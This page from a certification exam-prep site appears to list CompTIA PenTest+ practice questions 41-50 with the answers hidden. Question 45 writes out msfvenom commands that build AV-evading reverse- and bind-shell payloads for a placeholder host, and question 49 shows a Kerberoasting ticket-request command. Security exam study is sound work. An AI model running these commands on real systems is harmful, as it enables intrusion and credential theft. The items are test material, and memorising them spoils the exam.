Spring Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 5 out of 9 pages
Viewing questions 41-50 out of questions
Questions # 41:

A penetration tester assesses an application allow list and has limited command-line access on the Windows system. Which of the following would give the penetration tester information that could aid in continuing the test?

Options:

A.

mmc.exe


B.

icacls.exe


C.

nltest.exe


D.

rundll.exe


Expert Solution
Questions # 42:

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection


B.

SSRF


C.

XSS


D.

Server-side template injection


Expert Solution
Questions # 43:

A penetration tester must gain entry to a client's office building without raising attention. Which of the following should be the tester's first step?

Options:

A.

Interacting with security employees to clone a badge


B.

Trying to enter the back door after hours on a weekend


C.

Collecting building blueprints to run a site survey


D.

Conducting surveillance of the office to understand foot traffic


Expert Solution
Questions # 44:

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

Options:

A.

Service discovery


B.

OS fingerprinting


C.

Host discovery


D.

DNS enumeration


Expert Solution
Questions # 45:

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

Options:

A.

msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443


B.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000


C.

msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none


D.

net user add /administrator | hexdump > payload


Expert Solution
Questions # 46:

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

Options:

A.

Phishing


B.

Tailgating


C.

Whaling


D.

Spear phishing


Expert Solution
Questions # 47:

A penetration tester wants to automatically enumerate all ciphers permitted on TLS/SSL configurations across a client’s internet-facing and internal web servers. Which of the following tools or frameworks best supports this objective?

Options:

A.

Nmap Scripting Engine


B.

Shodan


C.

Impacket


D.

Netcat


E.

Burp Suite


Expert Solution
Questions # 48:

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

Options:

A.

Segmentation


B.

Mobile


C.

External


D.

Web


Expert Solution
Questions # 49:

During an assessment, a penetration tester runs the following command from a Linux machine:

GetUsersSPNs.py -dc-ip 172.16.1.1 DOMAIN.LOCAL/aholliday -request

Which of the following is the penetration tester trying to do?

Options:

A.

Crack the user password for aholliday


B.

Download all TGS tickets for offline processing


C.

Perform a pass-the-hash attack using the hash for aholliday


D.

Perform password spraying


Expert Solution
Questions # 50:

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

Options:

A.

IAST


B.

SBOM


C.

DAST


D.

SAST


Expert Solution
Viewing page 5 out of 9 pages
Viewing questions 41-50 out of questions